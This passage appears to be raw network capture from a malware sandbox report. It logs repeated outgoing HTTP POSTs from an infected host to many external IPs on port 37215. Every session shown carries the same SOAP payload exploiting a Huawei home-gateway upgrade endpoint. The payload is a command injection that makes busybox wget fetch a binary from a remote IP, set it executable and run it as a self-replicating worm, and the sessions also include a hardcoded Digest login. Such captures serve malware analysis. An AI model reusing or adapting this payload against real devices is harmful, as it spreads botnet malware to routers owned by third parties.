                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1387192.168.2.133717841.182.46.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559915066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1388192.168.2.136077441.237.247.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559937000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1389192.168.2.134258662.243.157.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559950113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1390192.168.2.1347324197.81.80.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559962988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1391192.168.2.1346260197.193.16.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559989929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1392192.168.2.135940441.43.238.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559999943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1393192.168.2.1341876157.152.127.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560036898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1394192.168.2.133950241.90.137.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560055971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1395192.168.2.135696041.140.52.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560081959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1396192.168.2.134002041.85.228.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.560097933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 